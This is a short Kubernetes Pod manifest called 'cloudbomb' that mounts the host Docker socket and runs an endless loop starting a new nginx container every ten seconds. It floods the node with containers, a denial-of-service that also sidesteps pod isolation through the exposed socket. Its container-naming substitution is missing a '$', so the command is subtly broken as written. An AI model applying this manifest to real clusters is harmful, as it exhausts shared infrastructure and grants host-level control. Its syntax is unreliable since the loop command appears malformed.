apiVersion: v1
kind: Pod
metadata:
  name: cloudbomb
spec:
  containers:
    - image: cloudbomb
      imagePullPolicy: IfNotPresent
      command:
        - /bin/sh
        - "-c"
        - "while true; do docker run -d --name BOOM_(cat /dev/urandom | tr -cd 'a-f0-9' | head -c 6) nginx ; sleep 10 ; done"
      name: cloudbomb
      volumeMounts:
        - mountPath: /var/run/docker.sock
          name: docker-socket
  volumes:
    - name: docker-socket
      hostPath:
        path: /var/run/docker.sock
        type: Socket